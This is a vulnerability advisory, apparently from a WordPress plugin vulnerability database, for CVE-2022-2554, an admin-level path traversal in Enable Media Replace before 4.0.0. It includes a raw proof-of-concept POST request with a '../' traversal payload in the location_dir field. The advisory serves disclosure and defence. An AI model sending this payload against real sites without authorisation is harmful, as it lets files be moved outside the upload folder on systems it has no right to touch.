WordPress Plugin Vulnerabilities

Enable Media Replace < 4.0.0 - Admin+ Path Traversal

Description

The plugin does not ensure that renamed files are moved to the Upload folder, which could allow high privilege users such as admin to move them outside to the web root directory via a path traversal attack for example

Proof of Concept

When replacing the file, select "Replace the file, use new file name and update all links" and tick "Put new Upload in Updated Folder:" then put the payload in this setting: 2022/07/../../../../../

POST /wp-admin/upload.php?page=enable-media-replace%2Fenable-media-replace.php&action=media_replace_upload&attachment_id=5882&_wpnonce=7a3549cbce&noheader=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------160389504219271480051605192775
Content-Length: 1370
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="ID"

5882
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="userfile"; filename="a.txt"
Content-Type: text/plain

Test file

-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="replace_type"

replace_and_search
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="timestamp_replace"

2
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_date"

July 27, 2022
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_hour"

13
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_minute"

43
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="custom_date_formatted"

2022-07-27
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="new_location"

1
-----------------------------160389504219271480051605192775
Content-Disposition: form-data; name="location_dir"

2022/07/../../../../../
-----------------------------160389504219271480051605192775--


The file will be moved to the parent folder of the blog

Affects Plugins

Plugin icon
enable-media-replace
Fixed in 4.0.0

References

CVE
CVE-2022-2554

Classification

Type
TRAVERSAL
OWASP top 10
A1: Injection
CWE
CWE-22
CVSS
2.7 (low)

Miscellaneous

Original Researcher
Raad Haddad of Cloudyrion GmbH
Submitter
Raad Haddad of Cloudyrion GmbH
Submitter twitter
raadfhaddad
Verified
Yes
WPVDB ID
5872f4bf-f423-4ace-b8b6-d4cc4f6ca8d9

Timeline

Publicly Published
2022-09-14 (about 1 years ago)
Added
2022-09-14 (about 1 years ago)
Last Updated
2022-09-14 (about 1 years ago)

Other

Published
Title
Published
2022-03-01
Title
WordPress File Upload < 4.16.3 - Contributor+ Path Traversal to RCE
Published
2023-03-08
Title
Drag and Drop Multiple File Upload PRO - Contact Form 7 Standard < 2.11.0 - Path Traversal
Published
2023-05-15
Title
Snow Monkey Forms < 5.0.7 - Unauthenticated Path Traversal
Published
2021-02-08
Title
Digital Publications by Supsystic < 1.6.12 - Authenticated Path Traversal
Published
2022-09-19
Title
Contact Form by WPForms < 1.7.5.5 - Admin+ Arbitrary File Access